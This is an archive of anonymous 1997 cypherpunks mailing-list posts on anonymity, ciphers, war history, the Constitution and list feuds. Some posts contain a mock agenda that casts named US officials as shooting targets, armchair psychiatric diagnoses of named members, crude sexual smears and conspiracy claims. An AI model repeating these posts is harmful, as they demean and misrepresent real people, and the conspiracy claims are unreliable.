It's easy to say that it's the feds, the ZOG, the NWO crew...but you can't name an individual can you?  Why is that?
Seriously, think about this question.  It has a lot to do with a major
cypherpunk theme: anonymity.  But in this case, with hardly any conscious
P.S. Notice how my response becomes "negated" by Monty's previous response when you read the first 6 lines of text in order:
If that were really true, you would have posted your message under your real
name (a.k.a., your persistent identity).  The fact that you chose to make your statement anonymously only proves the inverse of what you say.
Think how easily Monty's "response" could be used against me if the quoted text marks (>) were removed.  Truths are easily twisted into lies by those who seek advantage from such actions.

@_date: 1997-11-20 13:12:36
@_author: Anonymous 
@_subject: Traffic Analysis Tip #3207 
TRAFFIC ANALYSIS TIP  Seasonal Affective Disorder (SAD)
When performing traffic analysis and/or stylometry for the purpose of
discerning the sometimes subtle differences between genuine mental
imbalance and affectation of the same by boilerplate government and/or
corporate shills, one needs to take into account the possible role that
'Seasonal Affective Disorder,' (SAD), may play in emotive attacks on
the target, be it a group or a particular subject.
The onset of SAD can often be recognized by the correlation between
increasingly emotional attacks and specifically monitorable elements
of seasonal changes, such as the decreasing amount of light in the
northern and southern climes as winter advances.
Examples of this can be easily charted using posts originating from
ISP's such as sympatico.ca. The data can then be compared to that
garnered through an analysis of Hettinga's posts, showing that the latter are goal-oriented emotive attacks designed to provide identity-
associated confirmation/support of the current round of anonymous posts
aimed at denigrating the cypherpunks mailing list by associating it
directly, in the minds of others, with one or two individuals/targets
on the list.
Note that although SAD can aggravate existing conditions, such as OCD
(Obssesive-Compulsive Disorder), it does not change the basic traits
of those conditions.
The excessive diatribes of Choate, for instance, upon having a few
lines of one of his posts changed/misquoted by Toto/TruthMonger, were
shown by analysis to have been easily deflected by others into a more
generalized attack/defense-of-his-position.
While Hettinga's current attack might easily be confused with an
identity-fixation focus of the same general form of OCD, closer analysis would show that his posts continually return to goal-
oriented repetitive misstatements aimed toward linking the individual
to a specifically designed mind-construct being advanced by the
para//el anonymous posts.
Likewise, the effect of Seasonal Affective Disorder on those afflicted
with a wider variety of interconnected dysfuntionalities, such as the
ADHD/Tourette/OCD/Schizoid tendencies of TruthMonger  is to merely
increase the volatility of already existing conditions.
Analysis of the known posts of  under a variety of personas and
anonymous list offerings, shows the same wide set of dysfunctional anomalies working at cross-purposes on a broad spectrum of issues.
One of the keys to differentiating these posts from those produced
by boilerroom spook operations is recognizing the existence of multiple underlying signs of a broader range of diagnosic criterion
than is present in a willful affectation of dysfunctional conditions
designed to elicit para//el emotive reactions in other subscribers
to the mailing list.
The effect/influence of SAD has been shown in the past to be much
greater during high levels of El Nino activity.

@_date: 1997-11-20 13:32:32
@_author: Anonymous 
@_subject: e$: Snakes of Medusa on Wall Street? (fwd) 
"THE GREAT AWAKENING
"A conservative reaction against the world view of the new science was bound to follow, and the first half of the eighteenth century witnessed a number of religious revivals in both England and America.  They were sometimes desperate efforts to reassert the old values in the face of the new and, oddly enough, were themselves the direct product of the new cult of feeling, a philosophy which argued that man's greatest pleasure was derived from the good he did for others and that his sympathetic emotions (his joy as well as his tears) should not be contained."
 -- The Norton Anthology of American Literature, Third Edition, Volume 1
Being a New Englander, Bob should know about the revivalist of Northampton, Massachusetts: Jonathan Edwards.  His name is synonymous with the "Great As for the religious/ethical awakening that occurred prior to the War between the States, that has generally come to be known as "American Transcendentalism," especially the works of Whitman, Emerson and Thoreau.

@_date: 1997-11-20 14:23:06
@_author: Anonymous 
@_subject: Censorware Summit II (December 1-3) 
[Note government criminal and pacifist groups are absent from the list
 of organizations represented. --Defcon]
FOR IMMEDIATE RELEASE                   CONTACT:
Wednesday, November 19, 1997                     Anonymous
INTERNET/ONLINE SUMMIT: FOCUS ON FASCISTS RELEASES AGENDA FOR MEETING,
DECEMBER 1-3
WASHINGTON, D.C.-Organizers of the Internet/Online Summit: Focus on Fascists today released an agenda for the historic three-day meeting of free speech and freedom advocates, marksmen, guerilla leaders and
Constitution enforcement officials joining forces to find  ways to enhance the safety and freedom of citizens in cyberspace.
The meeting is the first time so many diverse organizations have come
together to address freedom and content issues related to citizens and
the established mass medium which has operated exceedingly well without
government interference. The Summit is the first in a series of discussions on issues affecting
free citizens in cyberspace, including advertising, access, privacy, and marketing and content.  The first meeting will focus on fascism and
The December 1-3 Summit will include speakers, panels, announcements of
initiatives taken by the Summit and its participants, and a small
exhibition of technological tools and commonly available munitions
to help citizens manage a censor's time off-line.  Panelists will be anonymous prior to the Summit.
The Summit Agenda, which is subject to armed intervention, follows:
MONDAY, DECEMBER 1,  5 p.m. - 8:30 p.m.
Registration and Opening Reception adjacent to technological tools weapons caches.
TUESDAY, DECEMBER 2, 7:30 a.m. - 6 p.m.
Call to Arms
Target Practice (Vice President Al Gore invited to pose)
Presentation on Fascist-approved Content with the Propaganda
Broadcasting System and others
Framing the Targets: targets Lois Jean White, President of the National
PTA Panel in Framing the Targets
Panel in "Release the Safety"
Luncheon Targets: Target of the Month Newt Gingrich, Godfather of
Government Theft William M. Daley
Presentation on Fascist Oppression On-Line: Attorney General Janet Reno
and small, moving-duck panelists
Presentation on Public Propaganda: Secretary Richard W. Riley and affirmatively-nodding panelists
Presentation on the Technology Munitions Kit
Panel on Censoring and Blocking
WEDNESDAY, DECEMBER 3,  8:30 a.m. - noon
Review of Previous Reichs:  Christine Varney, Chairperson of the Summit
Bavarian Roundtable with Summit Shills
Kids Panel Molested by Moral Majority Leaders
All activities will take place at a site overlooking the Renaissance Washington, D.C. Hotel at 666 Sixth Street, N.W.
Registration to attend the Summit must be done through the Summit's Web
site:   Separate registration forms are available at the site for reportwhores and the pubic, as well as other
target information as it become available.
A partial list of the organizations sponsoring the Summit includes:
Anonymous Arms Dealers Anonymous Paramilitarists
Anonymous Freedom Fighters
Anonyous Americans
Anonymous Libertarians
Anonymous Ninjas
Anonyous Assholes
Anonymous Average Citizens
Anonymous Citizens Living In Fear Of Their Government
Anonymous Secret Government Organizations
Anonymous BATF Agents of Oklahoma
Anonyous Mind-Controlled Dupes of the New World Order
Tim C. May
# # #

@_date: 1997-11-22 10:32:49
@_author: Anonymous 
@_subject: READ THIS FIRST! 
Besides the device, the box should contain:
   * Eight little rectangular snippets of paper that say "WARNING"
    * A plastic packet containing four 5/17 inch pilfer grommets and two
                club-ended 6/93 inch boxcar prawns.
 YOU WILL NEED TO SUPPLY: a matrix wrench and 60,000 feet of tram cable.
 IF ANYTHING IS DAMAGED OR MISSING: You IMMEDIATELY should turn to your
spouse and say: "Margaret, you know why this country can't make a car that can get all the way through the drive-through at Burger King without a major transmission overhaul?  Because nobody cares, that's  WARNING: This is assuming your spouse's name is Margaret.
                 -- Dave Barry, "Read This First!"

@_date: 1997-11-22 10:38:14
@_author: Anonymous 
@_subject: following cypher algorithm ? 
Does anybody know following cypher algorithm ?
Symmetric cipher : BATON , JUNIPER Public key cipher : KEA , MAYFLY

@_date: 1997-11-22 10:38:14
@_author: Anonymous 
@_subject: Free start up kit 
What's say we each send Robert "Mother Theresa" Lowery 10 copies of
our free Start-Up Kit.

@_date: 1997-11-22 10:39:58
@_author: Anonymous 
@_subject: Factor a 2048-bit number 
Theodor Schlickmann and Peter Trei have expressed some skepticism
regarding the 2048-bit number which I believe can be factored.
I confess that I do not know the exact method required, but I am
pretty sure it exists.
Hint 1: The method will not work to factor 2048-bit numbers in the
general case.
Hint 2: There is an observation which suggests the number may be
factored.  A one word hint will reveal this observation.
(I want to hold off on Hint 3 for a little while in case somebody is
already working on the problem.  If anybody wants me to withhold Hint
3, please post a message to the list and I may do so.  It seems to me
that it will be more fun to solve without Hint 3.)
Wouldn't it be neat to actually factor a 2048-bit number which was the
product of two large primes?
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-11-22 10:40:42
@_author: Anonymous 
@_subject: Environmentalism (was Re: Crimes) (fwd) 
Or trying to predict the content of the Cypherpunks Mailing list!

@_date: 1997-11-22 10:43:08
@_author: Anonymous 
@_subject: No Subject 
This comes the same day as a Wired News story
about detritus.net, an online gallery which
plans to host works of "appropriated," copyright-
infringing art. Better not take any digital
handouts at the gallery, or you're opt to join
them in the paddy wagons, too.
The assertion of "Intellectual property" = the control of human Mind.
Lock and load.
Reply-To: Netly Welcome to the reality that an increasing number of reasonable citizens
face: do something normal, reasonable, even constitutionally protected,
and face years in prison and huge fines.

@_date: 1997-11-22 10:47:43
@_author: Anonymous 
@_subject: Report on UN conference on Internet and racism 
just out of curiosity, where do you get your numbers?

@_date: 1997-11-22 10:49:07
@_author: Anonymous 
@_subject: Does anybody know ? 
Does anybody know  hypo-cypher algorithm ?
Symmetric cipher : BATON , JUNIPER Public key cipher : KEA , MAYFLY
If anybody know it, Please tell it to me.

@_date: 1997-11-22 11:23:23
@_author: Anonymous 
@_subject: Factor a 2048-bit number 
That is exactly right.  Hint 3 is more like an insight a puzzle solver
would have rather than that of a mathematician.  When you have this
insight you will know it.
If you want me to post Hint 3, just ask.  You'll have a good laugh if
you get it yourself, though.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-11-22 11:28:58
@_author: Anonymous 
@_subject: The Great Awakening (fwd) 
Uh, Hello?  Your post entitled "1st Great Awakening" describes the exact
same thing that I called simply, "The Great Awakening."  It was not, as you
say above, the 2nd one.
I did read the various posts you sent.  I don't know who chose the names for
the 2nd and 3rd "Great Awakenings", but they don't seem to have much to do
with religious revivalism like your "1st Great Awakening" and what I (and
the definitive Norton Anthology) refer to as simply "The Great Awakening."

@_date: 1997-11-22 11:51:59
@_author: Anonymous 
@_subject: [cpe:4985] State Department Advisory Group 
Joe Smith, Joe Smith Organization, 123 Joe Smith drive, Smithville, JS,
(JOE) JOE-SMITH, JO/ES/MITH, JOE-SMITH-JS, .

@_date: 1997-11-22 11:52:06
@_author: Anonymous 
@_subject: Further Costs of War 
A few more comments on World War II.
Had World War II been prevented, along with deaths of 50 million or so
people, we would also have been spared (in the United States) income
tax withholding.  Previously the only people paying income tax were
fairly wealthy and there was no withholding.
I doubt very much that income tax withholding would have been accepted
if the War were not used to justify it.  ("You don't want to pay
taxes?  What are you, a traitor?")
Without income tax withholding, it would have been hard to get to the
point where we are now.  The U.S. Federal government consumes about
40% of the GDP.  When the resources aren't wasted outright, they are
used to perpetrate evil in the world.
To put this in perspective, multiply your income by 1.4.  For example,
if your income is $50,000, that would be another $20,000 you would
have every single year.  Where could you spend that money?
If you simply saved it at 3% a year, in 30 years you would have about
$950,000.  That's all for doing exactly what you do now.  Who needs
national health insurance?
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-11-23 00:13:04
@_author: Anonymous 
@_subject: CIA - Some Questions 
Dear Cypherpunks,
In response to your upcoming questions, I have prepared the following materials:
No. Executive Order No. 12333 explicitly prohibits the Central Intelligence
Agency from engaging, either directly or indirectly, in assassinations. Interna
oversight process assure compliance.
No. In fact, the Central Intelligence Agency assists the US Government effort t
providing intelligence information to the Drug Enforcement Administration, the
the State Department.
J Smith (Esq).

@_date: 1997-11-23 16:26:37
@_author: Anonymous 
@_subject: [Fwd: [cpj:265] COS] 
I have a friend from Santa Fe who did some work with Omega and her
opinion was that their purpose in crypto OS development was aimed
toward using it as leverage for being bribed into compromising or
abandoning it in return for government/spook business.
Apparently, there are consultants in some of the former Eastern Bloc
countries who specialize in negotiations between corporations and
shadow agencies in order to find out the highest price they can
sell out or capitulate for without making it worth the spooks time
and effort to sabotage their project or whack them out. It seems
that it can be quite profitable if you don't waste money foolishly
on hiring programmers, engineers, etc.
I have to go now and work on my "Lounge Suit Larry Nukes DC While
Stripping Barbie Naked" program. It uses BAD IDEA encryption.
A. Fiend
    ^r

@_date: 1997-11-23 16:35:33
@_author: Anonymous 
@_subject: Digital signatures 
Timothy May was born when his mother was on the toilet.
          o       o
        /<         >\ Timothy May
        \\\_______///
        //         \\

@_date: 1997-11-23 18:00:14
@_author: Anonymous 
@_subject: [Fwd: [cpj:265] COS] 
Check out the number of companies in the computer security business
and closely related areas who have a board of directors composed of
ex-spooks and ex-military brass.
I can hardly wait for the Pretty Good Freeh-Dumb software to hit
the market after the pictures of J. Edgar Hoover buttfucking young
Louey are released.
A Future Political Prisoner To Be Named Later

@_date: 1997-11-24 04:01:29
@_author: Anonymous 
@_subject: Boys, 13, charged with E-mail threat to Hillary 
Sunday, November 23, 1997 - 20:40:28 MET
sending a threatening e-mail message over the Internet to Hillary Rodham Clinton.
to the first lady haven't been released, but U.S.
 Secret Service agents are expected to outline themn during a hearing Monday in Juvenile Court in Cordova, Tenn.
 and harassing Mrs. Clinton, could face a fine, counseling, community service or detention.

@_date: 1997-11-24 06:03:40
@_author: Anonymous 
@_subject: The hacker's friend 
"Microsoft and Netscape insist that the W3C does produce truly open
standards, and that it's the only way to make sure the Web doesn't
dissolve into chaos."
  The W3C is also producing a "single point of failure" so that hackers will be able to concentrate their energies on gaining access
to *everything*.

@_date: 1997-11-24 13:16:16
@_author: Anonymous 
@_subject: (No Subject) 
"Benjamin Chad Wienke"  sez:
Yep, that's definitely Second Dynamic out-ethics to the Scienos. Of course, they'd be glad to sell you some auditing to bring you up on the tone scale.
Got a few thousand extra dollars sitting around?
I didn't make up any of this stuff -- if you care enough to learn about it, do an Altavista search on "Operation Clambake." See L. Ron Hubbard's mind in action! Read about the Galactic Confederation! Thrill to the Xenu legend! Enjoy NOT spending your money to learn this stuff!
"I mock up my reactive mind." -- A great $cientology $ecret, their Clear
Cognition. I just saved you a few grand. Tip your waitress.

@_date: 1997-11-24 18:10:59
@_author: Anonymous 
@_subject: Choate Doesn't Do His Homework 
I prefer facts when it comes to making up my mind instead of baseless
claims.  For the others on this list who prefer the same, let me set the
record straight...
Yes, and you are the fabricator.  Bob claimed it happened in the 19th century (see Fact 1 below).  I claimed it happened in the early 18th century (see Fact 3 below).
For the umpteenth time, that was Bob's original claim, not mine.  See above.
Bullshit!  I did my homework.  You (and Bob) didn't.  But because I am a nice
guy, I share it with you here.
The bottomline is that you screwed up, Jim.  You misread my original post (confusing the 18th century for the 1800's) and started this whole chain of events.  The facts (not the claims) clearly bear this out.
T H E   F A C T S
[note: I have edited the attribution lines for clarity, but all posts are
referenced to the Cypherpunk Archive]
F A C T  1: F A C T  2: F A C T  3: F A C T  4: [Once again, yes I did.  1815-1850 does not equal early 18th century!]
F A C T  5: [Once again, Norton and myself referenced the Great Awakening to the
early 1700's/18th century: see Fact 3]

@_date: 1997-11-25 03:42:40
@_author: Anonymous 
@_subject: Further costs of war 
Personally, I do not believe in the infallibility of the Supreme
Court.  The people on the Court are just people.  They can make
mistakes.  They can have ulterior motives.  They can be corrupt.
The Constitution is understood by many people to be something like a
charter in which the people of the United States granted the
government certain powers, reserving all others to themselves.
The Constitution has meaning.  The Supreme Court may not amend this
meaning, it may only interpret it.  When the Court makes a decision
which is obviously not consistent with the meaning of the Constitution
it is reasonable to say that the Court is in error.  In an extreme
situation many people would say that it is reasonable for the people
of the United States to revoke the Charter granted to this government.
Consider this scenario: Chief Justice Rehnquist appears in Court
wearing a tutu.  He declares that the Court has just decided that in
emergency situations it is proper and Constitutional for the Supreme
Court to take control of the government to protect democracy.
Would it be reasonable to say that the Constitution had changed or
would it be reasonable to put the Chief Justice in the loony bin?
Let's take an example from history.  The United States decides to
enter World War I.  People who are opposed to this war and to the
draft make speeches opposing both policies.  A law is passed
forbidding this activity.  The Chief Justice declares that speech may
be controlled if it is akin to "yelling 'Fire!' in a crowded movie
house."  Following this logic, the government jails people who speak
against the War and the draft.  One of these people, Eugene Debs,
campaigns from jail for the Presidency and gets about a million votes.
Would it be proper to conclude that speaking against the War may be
punished Constitutionally or that the Court had failed to carry out
its duties?
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-11-25 03:49:56
@_author: Anonymous 
@_subject: Further costs of war 
Personally, I do not believe in the infallibility of the Supreme
Court.  The people on the Court are just people.  They can make
mistakes.  They can have ulterior motives.  They can be corrupt.
The Constitution is understood by many people to be something like a
charter in which the people of the United States granted the
government certain powers, reserving all others to themselves.
The Constitution has meaning.  The Supreme Court may not amend this
meaning, it may only interpret it.  When the Court makes a decision
which is obviously not consistent with the meaning of the Constitution
it is reasonable to say that the Court is in error.  In an extreme
situation many people would say that it is reasonable for the people
of the United States to revoke the Charter granted to this government.
Consider this scenario: Chief Justice Rehnquist appears in Court
wearing a tutu.  He declares that the Court has just decided that in
emergency situations it is proper and Constitutional for the Supreme
Court to take control of the government to protect democracy.
Would it be reasonable to say that the Constitution had changed or
would it be reasonable to put the Chief Justice in the loony bin?
Let's take an example from history.  The United States decides to
enter World War I.  People who are opposed to this war and to the
draft make speeches opposing both policies.  A law is passed
forbidding this activity.  The Chief Justice declares that speech may
be controlled if it is akin to "yelling 'Fire!' in a crowded movie
house."  Following this logic, the government jails people who speak
against the War and the draft.  One of these people, Eugene Debs,
campaigns from jail for the Presidency and gets about a million votes.
Would it be proper to conclude that speaking against the War may be
punished Constitutionally or that the Court had failed to carry out
its duties?
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-11-25 09:34:06
@_author: Anonymous 
@_subject: Further costs of war 
They burned the White House to the ground.  Does that count?  ;-)
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-11-25 09:38:14
@_author: Anonymous 
@_subject: Seeing Both Sides 
Britain would probably have been capable of controlling America had
France not intervened.
France provided desperately needed powder and money to the
revolutionaries.  During the siege of Boston it was seriously proposed
that bow and arrows be employed due to powder shortages.  Spears were
actually prepared for use!
France also provided officers to staff the poorly trained and
organized American armies, troops, and even a navy.
The final victory at Yorktown was largely a French operation, for
example.  Here is Richard N. Rosenfeld's take on it from "American
Page 418: "There are approximately 32,000 French soldiers and sailors
at Yorktown, four to six times the number of George Washington's army,
and more than twice, if not three times, the number of all Americans
at Yorktown, including militia.  Indeed, there are many more French
soldiers on the ground than American Continentals.  The entire
blockading force at sea is French."
Page 419: "Of French and American forces which encircle Charles
Cornwallis at Yorktown, the naval part of this circle consists
strictly of French warships (more than thirty) and sailors (nineteen
thousand!).  America has no warships in this naval blockade."
Page 419: "Orchestrating the siege at Yorktown is strictly a matter
for the French.  Washington has no experience in siege warfare.  The
French perfected the art.  Rochambeau has taken part in fourteen
sieges!  General Lebigne, the Chevalier Du Portail, and other French
officers and engineers take charge of siege operations."
Page 420: "Two French soldiers die for each American death at
Yorktown.  Two French soldiers are wounded for each American wound at
Yorktown.  French casualties exceed 250."
Page 421: "British General Charles O'Hara, acting on behalf of General
Charles Cornwallis (who has pleaded illness), attempts to surrender
Cornwallis' (sic) sword to French Commander in Chief General the Comte
de Rochambeau, but Rochambeau magnanimously refuses to accept the
surrender weapon and directs the British general to George
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-11-25 09:49:04
@_author: Anonymous 
@_subject: Iraq and computers 
This is an interesting development because it also makes it hard for
the Iraqi government to track what is going on, too.  The government
of Iraq has been aware of the dangers of computers for many years.  At
one time they were tightly controlled.  Even typewriters were
controlled.  The government had writing samples of each one.
Now, apparently, this policy is loosening.  This suggests that U.S.
policy of the last 8 years has managed to achieve what Saddam Hussein
could not - it has made the Hussein regime a genuinely popular
Still, it can't be universally popular.  How many cypherpunks live in
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-11-25 10:16:25
@_author: Anonymous 
@_subject: The Illusion of Freedom 
"Okay soldier, let's see that pass!"  Is this the treatment accorded
to a free man?
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-11-25 10:32:00
@_author: Anonymous 
@_subject: New Algorithm (reposted) 
I send you links to my site where my crypto algorithm is published. I
hope you will find time to visit it and see what I have
discover. Algorithms I have design are Anigma and MEX128. Anigma is
encryption algo based on use Variable Function Technology, it
main characteristic is possibility to create unique encryption function
for every possible key. This make algorithm strong to all
known attacks, this is only my thesis I look for your help to find out
is it true. Please visit
. Documentation
about Anigma and Mex128 now are available only in Macedonian.
I will appreciate very much if you give me your opinion about Anigma and
Mex128 or give me address of people who can do.

@_date: 1997-11-25 10:35:21
@_author: Anonymous 
@_subject: Report on UN conferen 
Mikhael Frieden  wrote reg. "illegal
 > > In a much more fundamental sense, if they were not given
 > > constitutional protections they really could be rounded up and
 > > bussed across the border.
 > > And what would be wrong with this?
 > Not a damned thing. While in this country they are in the act of
 > committing a crime. Once they have been deported they have
 > stopped committing the crime and then they can plead to appear
 > in court.
It used to be, that people are "felons under an increasing number
of laws". Now we've congressed to an "increasing number of felons
regardless of what they do" (their "crime" is being from "other
side" of the pencil-lines, that the statists have drawn on their
Even the "freedom-loving", no-boundaries etc. Cypherpunks fall over
those imaginery "border-lines", without having it ever dawn on
them, that *everything* done now to "illegal immigrants" will one
day soon be extended to the government-issued passport/digital
VeriSign-Tax-ID bearing "Americans" as well.
(Please refer to the "War on Drugs" for proof of patterns.)
In fact, it's being done already. The systems developed to "track
down illegal aliens" can track ANYBODY for that matter.

@_date: 1997-11-25 10:50:12
@_author: Anonymous 
@_subject: Seeing Both Sides 
Britain would probably have been capable of controlling America had
France not intervened.
France provided desperately needed powder and money to the
revolutionaries.  During the siege of Boston it was seriously proposed
that bow and arrows be employed due to powder shortages.  Spears were
actually prepared for use!
France also provided officers to staff the poorly trained and
organized American armies, troops, and even a navy.
The final victory at Yorktown was largely a French operation, for
example.  Here is Richard N. Rosenfeld's take on it from "American
Page 418: "There are approximately 32,000 French soldiers and sailors
at Yorktown, four to six times the number of George Washington's army,
and more than twice, if not three times, the number of all Americans
at Yorktown, including militia.  Indeed, there are many more French
soldiers on the ground than American Continentals.  The entire
blockading force at sea is French."
Page 419: "Of French and American forces which encircle Charles
Cornwallis at Yorktown, the naval part of this circle consists
strictly of French warships (more than thirty) and sailors (nineteen
thousand!).  America has no warships in this naval blockade."
Page 419: "Orchestrating the siege at Yorktown is strictly a matter
for the French.  Washington has no experience in siege warfare.  The
French perfected the art.  Rochambeau has taken part in fourteen
sieges!  General Lebigne, the Chevalier Du Portail, and other French
officers and engineers take charge of siege operations."
Page 420: "Two French soldiers die for each American death at
Yorktown.  Two French soldiers are wounded for each American wound at
Yorktown.  French casualties exceed 250."
Page 421: "British General Charles O'Hara, acting on behalf of General
Charles Cornwallis (who has pleaded illness), attempts to surrender
Cornwallis' (sic) sword to French Commander in Chief General the Comte
de Rochambeau, but Rochambeau magnanimously refuses to accept the
surrender weapon and directs the British general to George
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-11-25 11:03:07
@_author: Anonymous 
@_subject: Violence and Depravity 
I've removed the discussion regarding McVeigh's involvement.  It is
entirely possible he is an Oswald.  I simply do not know.  However, my
discussion was really intended to consider the morality of war and to
point out that McVeigh's alleged actions and alleged values are not
far removed from those exercised by governmentally sponsored warriors.
If you like, change all the names and call it a thought problem.
For the sake of discussion, let's say that the Oklahoma City bombing
was the act of provocateurs hoping to increase the power and authority
of the U.S. Federal government.  It is the case that the use of
violence has been applied to this goal successfully many times in the
This certainly does call into question my claim that "Violence is, in
nearly every case, a poor investment of time, money, and energy."
Your observation and my claim are actually not inconsistent if you
consider that I do not consider increasing the power and authority of
most governments as a good thing.
Let's expand the discussion to war.  If one considers it desirable to:
1. increase taxes,
2. to waste vast resources,
3. to kill large numbers of civilians indiscriminately or methodically,
4. to kill large numbers of conscripts,
5. to destroy the land,
6. to create millions of people who will live the rest of their lives
   in post combat nightmares,
7. to lay the seeds for future wars,
8. to create thousands, or even millions, of orphans,
9. to cause food shortages and disease,
10. and to traumatize human society,
then violence in the form of war is a good investment.  Not too many
people see this as desirable.
I still maintain that in nearly every case, if one is intent on
pursuing a worthwhile goal, it will not be attained through the use of
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-11-25 12:06:33
@_author: Anonymous 
@_subject: Report on UN conferen 
Please give us some references to your abusive and highly infalmmatory
allegations that the Gov't has followed a pattern of transgression on
the rights of any judaeo-christian-god-fearing-tax-paying-40bit-key-using-honest-law-abiding-citizen.(TM)
I for one just can't bring myself to believe it.
Proof Please.  Or at least a more concrete reference to these nebulous
systems would be nice.

@_date: 1997-11-25 16:15:31
@_author: Anonymous 
@_subject: Further costs of war 
I assume you are in the U.S. on a visa, right?  I would recommend
using a remailer for this sort of seditious comment.  (Seriously!)
As late as the 1930s, the U.S. Army had detailed plans for an invasion
of Canada.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-11-26 00:03:19
@_author: Anonymous 
@_subject: Further costs of war (fwd) 
There is no such thing as an off topic post on the new cypherpunks list,
at least according to Tim May and Monty Cantsin.  Whatever interests them
is automatically on-topic.

@_date: 1997-11-26 02:37:47
@_author: Anonymous 
@_subject: New free speech oriented civil rights site 
...and some cypherpunks?
Not to mention nationality.  "You go, chop chop," says Tim May, making fun
of someone apparently from Japan.
Cypherpunks other than May, Geiger, and the despicable Vulis will
welcome a new civil rights effort which is built around respect for
freedom of speech.
Cypherpunk technologies will be a major force to eliminate racism.
With privacy protected transactions, the color of a person's skin, his
religion and his ethnicity are no longer apparent.  People will be able
to succeed on merit - and not the "good old boys" definition of merit,
where somehow only white males seem to have what it takes.
Cypherpunks need to build bridges to minority communities, to show them
how these technologies can advance their cause.  Racist comments by
supposedly respected list members are harmful and must be countered in
order to show that these views do not reflect the feelings of most

@_date: 1997-11-26 04:46:29
@_author: Anonymous 
@_subject: Prevention of War 
It looks like some context was lost.  My comments on preventing war
were part of an ongoing discussion on the effect cypherpunkly tools
may have on wars.  So, the particular "methodology" I had in mind was
that the development of extensive cross border relationships would
make wars harder to prosecute.
Imagine that in 1938 Germany that half the relationships people had
happened to cross borders.  This would mean that it would have been
far easier for many people to simply flee Germany because they would
have more couches to sleep on abroad, more people who would maybe lend
money to make it possible, and more world wide sympathy for refugees.
Also, imagine that assets were easily moved around the world and that
the German government would have been unable to control this.  This
would have made it easier for refugees to simply move what assets they
had out of the country.  But, they would probably only commit a
portion of their assets to German control, anyway, which would mean no
movement would even be necessary.
The net result of Nazi policies would have been large numbers of
people fleeing and depriving Germany of their talents and
I do not just mean Jewish people.  Alex Le Heux mentioned that he felt
sorry for the conscripts in the Germany army who were forced to invade
other countries.  The reason people are conscripted is because they
would not otherwise volunteer.  If it was a relatively simple matter
to avoid military service, how many would fail to do so?  (And
remember that when half your friends do not have your nationality,
appeals to patriotism are less powerful.)
It is not clear that people in Germany who held substantial wealth
were all that sympathetic to Hitler.  Unfortunately, Hitler seemed to
provide a way for them to protect their wealth from other worse
people.  Later, they had to cooperate with the German government in
order to keep their wealth.  (See, for instance, the extensive
negotiations during the War to ensure that the oldest son of the Krupp
family would, in fact, inherit the firm.)
However, if the wealthy had their assets distributed through a number
of countries, this problem would have been mitigated.
The result of the policies of the German government would have been
simply to alienate and expatriate the most useful elements of German
society and deprive it of the ability to credibly wage war.
However, leaving cypherpunk issues aside, it is possible that the
necessity of World War II has been exaggerated.
The Japanese in 1941 were somewhat dependent on oil from the
Phillipines.  The last straw was when the U.S. embargoed this oil.
That may have been good policy, but it provoked the War.
Another little item which is usually given a strange spin is that
Britain and France declared war on Germany, not the other way around.
Perhaps that was good policy, but it is important to remember who
attacked whom.
There is a lot to be said for delaying the start of a war because
unexpected developments may later make a peace possible.
It's worth noting that Hitler's most evil activities didn't occur
until the war really got going in a big way.  This made it much harder
for people to question or even know the policies their government was
carrying out.  ("What are you, a traitor?")
Also, it is clear that the Allied governments had not entered the War
for altruistic reasons.  Few Jewish refugees were accepted during the
1930s even though they were clearly being mistreated and had every
reason to flee Germany.  Allied knowledge of the Holocaust was
*suppressed* expressly to avoid popular support for admitting
After the War the U.S. even smuggled large numbers of Nazis, including
many war criminals, out of Germany and into South America.
Any American who wanted to do the right thing for the human race
during World War II would have been wise to stay out of the Army and
spend time and effort just finding out what was going on.  A
relatively small number of people dedicated to exposing the Holocaust
would have done more good for the world than many thousands of
soldiers.  Ironically, these people would probably have had to outwit
both the American and German governments in finding the facts and
publicizing them.
The links between the two World Wars are strong.  Had World War I been
avoided - and it could have been - many of the issues I have discussed
regarding World War II would not even have occurred.
This was not a pretext for the war because it hadn't occurred yet!
The War itself made the Holocaust feasible.
Countries rarely invade other countries for altruistic reasons, but
they have be dressed up this way for popular consumption.
And let us note that this was not an elected position.  The other
countries (and people!) in the world did not get together and ask the
U.S. government to play this role.  Probably it's most accurate to
describe this as a propaganda technique to get American popular
support for policies designed to promote American hegemony.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-11-26 05:24:35
@_author: Anonymous 
@_subject: Quoting Portions of a Signed Document 
It would be neat if you could quote people and prove that they signed
the particular paragraph quoted without supplying the entire text.  Is
there a way to do this?  (It seems impossible, but so does mental
A crude approach would be to sign every paragraph or line separately,
but that's obviously inelegant.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-11-26 06:27:36
@_author: Anonymous 
@_subject: Wired: Faceless Freedom on the Net 
Faceless Freedom on the Net
     by Theta Pavis      7:30am  25.Nov.97.PST
     NEWPORT BEACH, California - When a whole weekend is dedicated
     to exploring the principles of electronic anonymity, some big concepts
     about basic human freedoms get thrown around. And though he has
     spent a lot of time in the past couple of years providing tools that
     allow people to maintain their privacy while communicating in the
     wide-open spaces of online communications, Lance Cottrell has seen
     the more mundane realities of the anonymity issue.      A couple years back, Cottrell began distributing his Mixmaster
     anonymous remailer. The ability to tell the truth without announcing
     to the world, or reprisal-minded enemies, just who is speaking might
     be a cornerstone of digital freedom. But it also opens the door to those
     for whom anonymity is just a novel tool for pulling a nasty prank.      Cottrell, who created Mixmaster while working on his physics
     doctorate at the University of California, San Diego, said the pure
     novelty of anonymous tools made them attractive at first.      "People used them in abusive ways for the same reason people climb
     Mount Everest - because it's there," Cottrell said during a
     weekend-long conference here on the technical and philosophical
     underpinnings of electronic anonymity. The session, titled
     "Anonymous and Pseudonymous Communication on the Internet," was
     sponsored by the American Association for the Advancement of
     Science.      Cottrell, who describes himself as a "hard-line extremist in favor of
